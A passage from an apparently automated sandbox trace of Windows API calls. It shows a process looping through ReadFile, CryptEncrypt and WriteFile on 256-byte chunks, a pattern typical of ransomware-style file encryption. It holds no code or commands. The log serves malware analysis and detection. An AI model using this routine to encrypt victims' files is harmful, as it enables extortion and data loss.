lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.650] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.650] GetLastError () returned 0x0 [0148.650] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.650] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.651] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.651] GetLastError () returned 0x0 [0148.651] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.651] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.651] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.651] GetLastError () returned 0x0 [0148.651] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.651] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.651] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.651] GetLastError () returned 0x0 [0148.651] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.651] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.651] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.651] GetLastError () returned 0x0 [0148.651] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.651] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.651] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.651] GetLastError () returned 0x0 [0148.651] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.651] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.651] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.651] GetLastError () returned 0x0 [0148.651] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.651] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.651] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.651] GetLastError () returned 0x0 [0148.651] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.652] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.652] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.652] GetLastError () returned 0x0 [0148.652] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.652] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.652] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.652] GetLastError () returned 0x0 [0148.652] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.652] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.652] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.652] GetLastError () returned 0x0 [0148.652] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.652] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.652] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.652] GetLastError () returned 0x0 [0148.652] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.652] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.652] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.652] GetLastError () returned 0x0 [0148.652] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.652] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.652] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.652] GetLastError () returned 0x0 [0148.652] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.653] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.653] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.653] GetLastError () returned 0x0 [0148.653] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.653] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.653] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.653] GetLastError () returned 0x0 [0148.653] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.653] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.653] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.653] GetLastError () returned 0x0 [0148.653] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.653] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.653] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.653] GetLastError () returned 0x0 [0148.653] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.653] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.653] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.653] GetLastError () returned 0x0 [0148.653] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.653] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.653] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.653] GetLastError () returned 0x0 [0148.653] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.653] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.653] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.654] GetLastError () returned 0x0 [0148.654] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.654] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.654] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.654] GetLastError () returned 0x0 [0148.654] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.654] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.654] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.654] GetLastError () returned 0x0 [0148.654] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.654] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.654] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.654] GetLastError () returned 0x0 [0148.654] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.654] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.654] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.654] GetLastError () returned 0x0 [0148.654] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.654] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.654] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.654] GetLastError () returned 0x0 [0148.654] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.654] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.654] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.654] GetLastError () returned 0x0 [0148.654] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.655] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.655] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.655] GetLastError () returned 0x0 [0148.655] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.655] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.655] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.655] GetLastError () returned 0x0 [0148.655] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.655] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.655] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.655] GetLastError () returned 0x0 [0148.655] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.655] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.655] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.655] GetLastError () returned 0x0 [0148.655] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.655] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.655] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.655] GetLastError () returned 0x0 [0148.655] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.655] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.655] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, 